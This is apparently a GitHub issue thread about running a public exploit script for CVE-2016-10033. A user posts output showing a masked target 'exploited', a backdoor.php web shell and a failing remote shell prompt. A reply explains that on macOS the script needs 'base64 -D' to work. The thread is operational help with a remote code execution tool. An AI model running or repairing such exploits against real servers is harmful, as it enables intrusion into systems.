Not sure how it works.
thisisALPINE opened this issue · 3 comments
`./exploit.sh xxxxx:80
[+] CVE-2016-10033 exploit by opsxcq
[+] Exploiting xxxxx:80
[+] Target exploited, acessing shell at http://xxxxx:80/backdoor.php
[+] Running whoami
base64: invalid option -- d
Usage: base64 [-dhvD] [-b num] [-i in_file] [-o out_file]
-h, --help display this message
-D, --decode decodes input
-b, --break break encoded string into num character lines
-i, --input input file (default: "-" for stdin)
-o, --output output file (default: "-" for stdout)
RemoteShell>
Whatever thing I input after this (like ls, cd, whoami), I always get this kind of error message
base64: invalid option -- d Usage: base64 [-dhvD] [-b num] [-i in_file] [-o out_file] -h, --help display this message -D, --decode decodes input -b, --break break encoded string into num character lines -i, --input input file (default: "-" for stdin) -o, --output output file (default: "-" for stdout)
What is going on? Are there other commands?
Are you running this exploit on Mac OS X ?
Yes!
Just change the code in exploit to use base64 -D
instead of base64 -d